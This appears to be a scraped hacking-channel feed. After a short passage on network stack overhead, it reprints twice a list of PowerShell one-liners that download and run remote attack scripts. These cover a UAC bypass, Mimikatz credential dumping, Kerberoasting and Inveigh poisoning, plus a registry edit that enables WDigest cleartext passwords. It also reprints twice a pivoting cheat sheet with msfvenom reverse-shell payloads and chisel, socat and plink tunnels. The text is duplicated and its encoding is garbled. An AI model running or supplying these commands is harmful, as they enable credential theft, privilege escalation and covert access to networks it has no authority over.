> Therefore, in order to manage these slow devices, the operating system has to design a complicated mechanism for rate adaptation, data caching, etc., whether it is Unix/Linux or Windows, are designed under this assumption.
However, things are quietly changing, and peripherals are gradually becoming faster and more intelligent. They are almost the same as CPUs. More and more peripherals have built-in memory chips, just like another group of CPU/memory hanging on the same block On the motherboard...
π¦At this time, the operating system should be more suitable as a coordinator, and no longer suitable for continuing to be a manager, but the complex management mechanisms of the old era still exist. Take the network protocol stack as an example:
1) The synchronization overhead of various linked lists in a multi-CPU environment.
2) The non-sleepable soft interrupt path is too long.
3) The allocation and release of sk_buff.
4) Memory copy overhead.
5) Cache miss caused by context switching.
β¦
6) Clearly, these mechanisms slow age 10Mbps / 100Mbps network card is no problem, at that time the application most of the time waiting for the card to send data. Now in the era of 1000Mbps/10Gbps/40Gbps network cards, the reverse is true. The data is quickly received, but it is all blocked in the core.
π¦Therefore, various optimization measures should come with the demand:
1) Network card RSS, multiple queues.
2) Interrupt threading.
3) Split lock granularity.
4) Busypoll.
Share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C βIEX (New-Object Net.WebClient).DownloadString(βhttps://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1β);Invoke-AllChecksβ
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y βNBNS Y βmDNS Y βProxy Y -LogOutput Y -FileOutput Y"
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C βIEX (New-Object Net.WebClient).DownloadString(βhttps://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1β);Invoke-AllChecksβ
# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y βNBNS Y βmDNS Y βProxy Y -LogOutput Y -FileOutput Y"
# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PORT FORWARDING "port to port":
-Your own :
----MSF----
Most platforms
Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse
----SSH----
For Linux
~C "if you already have an SSH session"
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
For reverse shell:
msfvenom -p linux/x86/shellreversetcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1
---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
---SOCAT----
For linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
---CHISEL----
Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:YOUR LOCAL IP:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------
DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf
----MSF----
Most platforms
Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)
(portscan once created route)
use auxilliary/scanner/portscan/tcp
set RHOSTS IP (pivoting onto thats not part of arpscan you ran)
(if a machine has port 80 and webports, to check it through out machine we have to create a portworward)
portfwd add -l 8001 -p 80 -r IP
(then go to 127.0.0.1:8001)
----SSH----
For Linux
-D1080
---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL----
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦PORT FORWARDING "port to port":
-Your own :
----MSF----
Most platforms
Forward:
Get meterpreter session on one of the dual homed machines
portfwd add -l 4445 -p 4443 -r 10.1.1.1
Use -R to make it reverse
----SSH----
For Linux
~C "if you already have an SSH session"
-R 8081:172.24.0.2:80 (on my Kali machine listen on 8081, get it from 172.24.0.2:80)
<KALI 10.1.1.1>:8081<------------<REMOTE 172.24.0.2>:80
Now you can access 172.24.0.2:80, which you didn't have direct access to
-L 8083:127.0.0.1:8084 (on your machine listen on 8083, send it to my Kali machine on 8084)
<KALI 127.0.0.1>:8084<------------<REMOTE 10.1.1.230>:8083<------------<REMOTE X.X.X.X>:XXXX
run nc on port 8084, and if 10.1.1.230:8083 receives a reverse shell, you will get it
For reverse shell:
msfvenom -p linux/x86/shellreversetcp LHOST=10.1.1.230 LPORT=8083 -f exe -o shell
Run it on 2nd remote target to get a shell on Kali
Or if you didn't have an SSH session, then SSH to your Kali from target machine:
On Kali: service ssh start "add a user, give it /bin/false in /etc/passwd"
ssh - -R 12345:192.168.122.228:5986 test@10.1.1.1
---PLINK----
Just like SSH, on Windows
service ssh start , and transfer /usr/share/windows-binaries/plink.exe to the target machine
On Target: plink.exe 10.1.1.1 -P 22 -C -N -L 0.0.0.0:4445:10.1.1.1:4443 -l KALIUSER -pw PASS
---SOCAT----
For linux
Forward your 8083 to 62.41.90.2:443
./socat TCP4-LISTEN:8083,fork TCP4:62.41.90.2:443
---CHISEL----
Most platforms
Remote static tunnels "port to port":
On Kali "reverse proxy listener":
./chisel server -p 8000 -reverse
General command:
./chisel client <YOUR IP>:<YOUR CHISEL SERVER PORT> L/R:YOUR LOCAL IP:<TUNNEL LISTENING PORT>:<TUNNEL TARGET>:<TUNNEL PORT>
Remote tunnels "access IP:PORT you couldn't access before":
On Target:
./chisel client 10.1.1.1:8000 R:127.0.0.1:8001:172.19.0.3:80
Local tunnels "listen on the target for something, and send it to us":
On Target:
./chisel client 10.1.1.1:8000 9001:127.0.0.1:8003
----------------------------------------------------------------------------------------
DYNAMIC "port to any":
setup proxychains with socks5 on 127.0.0.1:1080
Or set up socks5 proxy on firefox
For nmap use -Pn -sT or use tcp scanner in msf
----MSF----
Most platforms
Get meterpreter session on one of the dual homed machines
Auto route to 10.1.1.0 (multi/manage/autoroute)
Start socks proxy (auxiliary/server/socks4a)
(portscan once created route)
use auxilliary/scanner/portscan/tcp
set RHOSTS IP (pivoting onto thats not part of arpscan you ran)
(if a machine has port 80 and webports, to check it through out machine we have to create a portworward)
portfwd add -l 8001 -p 80 -r IP
(then go to 127.0.0.1:8001)
----SSH----
For Linux
-D1080
---PLINK---
Just like SSH, on Windows
On Target: plink.exe 10.1.1.1 -P 22 -C -N -D 1080 -l KALIUSER -pw PASS
---CHISEL----
Most platforms
On Kali:
./chisel server -p 8000 -reverse
On Target:
./chisel client 10.1.1.1:8000 R:8001:127.0.0.1:1080
./chisel server -p 8001 --socks5
On Kali:
./chisel client 127.0.0.1:8001 socks
ENJOYβ€οΈππ»
β git sources
β β β Uππ»βΊπ«Δπ¬πβ β β β